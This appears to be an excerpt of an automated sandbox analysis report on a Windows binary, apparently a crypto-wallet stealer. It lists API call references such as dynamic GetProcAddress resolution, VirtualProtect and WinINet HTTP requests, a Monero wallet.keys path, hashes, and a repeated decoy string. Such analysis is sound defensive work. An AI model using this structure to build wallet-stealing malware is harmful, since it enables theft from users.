                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: aa1e505f950670c9847dd9a3bc7329e902b6fbf936f7a5ac0330af98eb0a2082
                                      • Instruction ID: 6ca33e904e4904a067b3be94cb175c003d57eb2432325bbdb53516f3d35ad41b
                                      • Opcode Fuzzy Hash: aa1e505f950670c9847dd9a3bc7329e902b6fbf936f7a5ac0330af98eb0a2082
                                      • Instruction Fuzzy Hash: 79A16BB5500341BFC345EFA8EE889663BF9F79C301704C51AE607A3264D6BDA841DF2A
                                      Function 005245C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 677 5245c0-524695 RtlAllocateHeap 694 5246a0-5246a6 677->694 695 52474f-5247a9 VirtualProtect 694->695 696 5246ac-52474a 694->696 696->694
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0052460F
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0052479C
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052473F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005246B7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524770
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524662
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005246C2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005245F3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524765
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005245D2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524734
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005246D8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052477B
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052471E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052475A
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005245DD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005245E8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524713
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524683
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052474F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524729
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005245C7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005246AC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005246CD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524657
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00524678
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052466D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0052462D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 0673aada18f2d6530cbabe4569619a4754cde376a6c934fe9c06b0462998afea
                                      • Instruction ID: b15b6ed4603382f2d1ff8245e0f0d9c83a031fd074f235376306018364f44346
                                      • Opcode Fuzzy Hash: 0673aada18f2d6530cbabe4569619a4754cde376a6c934fe9c06b0462998afea
                                      • Instruction Fuzzy Hash: 0241F6706C7E047BE624BFAFA843EFD7B577F4AB0CF605844AA4467681DBF06500A522
                                      Function 00524880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 524880-524942 call 53a7a0 call 5247b0 call 53a740 * 5 InternetOpenA StrCmpCA 816 524944 801->816 817 52494b-52494f 801->817 816->817 818 524955-524acd call 538b60 call 53a920 call 53a8a0 call 53a800 * 2 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a920 call 53a8a0 call 53a800 * 2 InternetConnectA 817->818 819 524ecb-524ef3 InternetCloseHandle call 53aad0 call 529ac0 817->819 818->819 905 524ad3-524ad7 818->905 829 524f32-524fa2 call 538990 * 2 call 53a7a0 call 53a800 * 8 819->829 830 524ef5-524f2d call 53a820 call 53a9b0 call 53a8a0 call 53a800 819->830 830->829 906 524ae5 905->906 907 524ad9-524ae3 905->907 908 524aef-524b22 HttpOpenRequestA 906->908 907->908 909 524b28-524e28 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a9b0 call 53a8a0 call 53a800 call 53a920 call 53a8a0 call 53a800 call 53a740 call 53a920 * 2 call 53a8a0 call 53a800 * 2 call 53aad0 lstrlen call 53aad0 * 2 lstrlen call 53aad0 HttpSendRequestA 908->909 910 524ebe-524ec5 InternetCloseHandle 908->910 1021 524e32-524e5c InternetReadFile 909->1021 910->819 1022 524e67-524eb9 InternetCloseHandle call 53a800 1021->1022 1023 524e5e-524e65 1021->1023 1022->910 1023->1022 1024 524e69-524ea7 call 53a9b0 call 53a8a0 call 53a800 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00524915
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 0052493A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00524ABA
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00540DDB,00000000,?,?,00000000,?,",00000000,?,00F1E758), ref: 00524DE8
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00524E04
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00524E18
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00524E49
                                      • InternetCloseHandle.WININET(00000000), ref: 00524EAD
                                      • InternetCloseHandle.WININET(00000000), ref: 00524EC5
                                      • HttpOpenRequestA.WININET(00000000,00F1E808,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00524B15
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00524ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: c8e8ce209ba2de3817c9f4a7b0d7cee95f902dc9a64753c40bc6241a306f06db
                                      • Instruction ID: f1cfa6d469eeebc7b1914ec45291da18477af80bd6479bf400c242ee01114996
                                      • Opcode Fuzzy Hash: c8e8ce209ba2de3817c9f4a7b0d7cee95f902dc9a64753c40bc6241a306f06db
                                      • Instruction Fuzzy Hash: B812ED72910219AADB15EB90DC9AFEEBB78BF94300F504199F14672091EF702F49CF66
                                      Function 00537850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005211B7), ref: 00537880
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537887
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0053789F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 0e835011d1d3f2b5e75d05ad3a0f7fa658586e2268c2def20baa1563adb76547
                                      • Instruction ID: 81b4437becce929cdc886f346f7a8ba8b929a0fefbce72bd0535594ce54e7124
                                      • Opcode Fuzzy Hash: 0e835011d1d3f2b5e75d05ad3a0f7fa658586e2268c2def20baa1563adb76547
                                      • Instruction Fuzzy Hash: E0F04FB1D44309ABCB10DF98DD49BAEFBB8FB08711F10465AFA06A3680C7B815048FA1
                                      Function 00521160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 7a296bc43a90c5c76152db24799a8f78ba5a08f6ec47f877e7ae5b169f67f152
                                      • Instruction ID: 97d47990bfe4e99c9a08c4a36a206fc72214eceb54f2ae4e135f2b758b1fe691
                                      • Opcode Fuzzy Hash: 7a296bc43a90c5c76152db24799a8f78ba5a08f6ec47f877e7ae5b169f67f152
                                      • Instruction Fuzzy Hash: AED05E7490030CEBCB00DFE0D84A6DDBB78FB08311F000554D90672340EA709491CAAA
                                      Function 00539C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 539c10-539c1a 634 539c20-53a031 GetProcAddress * 43 633->634 635 53a036-53a0ca LoadLibraryA * 8 633->635 634->635 636 53a146-53a14d 635->636 637 53a0cc-53a141 GetProcAddress * 5 635->637 638 53a153-53a211 GetProcAddress * 8 636->638 639 53a216-53a21d 636->639 637->636 638->639 640 53a298-53a29f 639->640 641 53a21f-53a293 GetProcAddress * 5 639->641 642 53a337-53a33e 640->642 643 53a2a5-53a332 GetProcAddress * 6 640->643 641->640 644 53a344-53a41a GetProcAddress * 9 642->644 645 53a41f-53a426 642->645 643->642 644->645 646 53a4a2-53a4a9 645->646 647 53a428-53a49d GetProcAddress * 5 645->647 648 53a4ab-53a4d7 GetProcAddress * 2 646->648 649 53a4dc-53a4e3 646->649 647->646 648->649 650 53a515-53a51c 649->650 651 53a4e5-53a510 GetProcAddress * 2 649->651 652 53a612-53a619 650->652 653 53a522-53a60d GetProcAddress * 10 650->653 651->650 654 53a61b-53a678 GetProcAddress * 4 652->654 655 53a67d-53a684 652->655 653->652 654->655 656 53a686-53a699 GetProcAddress 655->656 657 53a69e-53a6a5 655->657 656->657 658 53a6a7-53a703 GetProcAddress * 4 657->658 659 53a708-53a709 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00F05C90), ref: 00539C2D
                                      • GetProcAddress.KERNEL32(74DD0000,00F05E10), ref: 00539C45
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A2C0), ref: 00539C5E
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A278), ref: 00539C76
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A290), ref: 00539C8E
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A230), ref: 00539CA7
                                      • GetProcAddress.KERNEL32(74DD0000,00F0BBA8), ref: 00539CBF
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CEA0), ref: 00539CD7
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D098), ref: 00539CF0
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF30), ref: 00539D08
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE88), ref: 00539D20
                                      • GetProcAddress.KERNEL32(74DD0000,00F05B70), ref: 00539D39
                                      • GetProcAddress.KERNEL32(74DD0000,00F05B90), ref: 00539D51
                                      • GetProcAddress.KERNEL32(74DD0000,00F05E50), ref: 00539D69
                                      • GetProcAddress.KERNEL32(74DD0000,00F05BB0), ref: 00539D82
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CEB8), ref: 00539D9A
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CED0), ref: 00539DB2
                                      • GetProcAddress.KERNEL32(74DD0000,00F0BBD0), ref: 00539DCB
                                      • GetProcAddress.KERNEL32(74DD0000,00F05D50), ref: 00539DE3
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE70), ref: 00539DFB
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE28), ref: 00539E14
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CFD8), ref: 00539E2C
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D050), ref: 00539E44
                                      • GetProcAddress.KERNEL32(74DD0000,00F05BD0), ref: 00539E5D
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D080), ref: 00539E75
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CFA8), ref: 00539E8D
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D020), ref: 00539EA6
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CEE8), ref: 00539EBE
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF00), ref: 00539ED6
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF48), ref: 00539EEF
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CDF8), ref: 00539F07
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE58), ref: 00539F1F
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF18), ref: 00539F38
                                      • GetProcAddress.KERNEL32(74DD0000,00F105C0), ref: 00539F50
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF60), ref: 00539F68
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CFC0), ref: 00539F81
                                      • GetProcAddress.KERNEL32(74DD0000,00F05CD0), ref: 00539F99
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF78), ref: 00539FB1
                                      • GetProcAddress.KERNEL32(74DD0000,00F059F0), ref: 00539FCA
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF90), ref: 00539FE2
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D068), ref: 00539FFA
                                      • GetProcAddress.KERNEL32(74DD0000,00F058D0), ref: 0053A013
                                      • GetProcAddress.KERNEL32(74DD0000,00F05810), ref: 0053A02B
                                      • LoadLibraryA.KERNEL32(00F1CE40,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A03D
                                      • LoadLibraryA.KERNEL32(00F1CFF0,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A04E
                                      • LoadLibraryA.KERNEL32(00F1D008,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A060
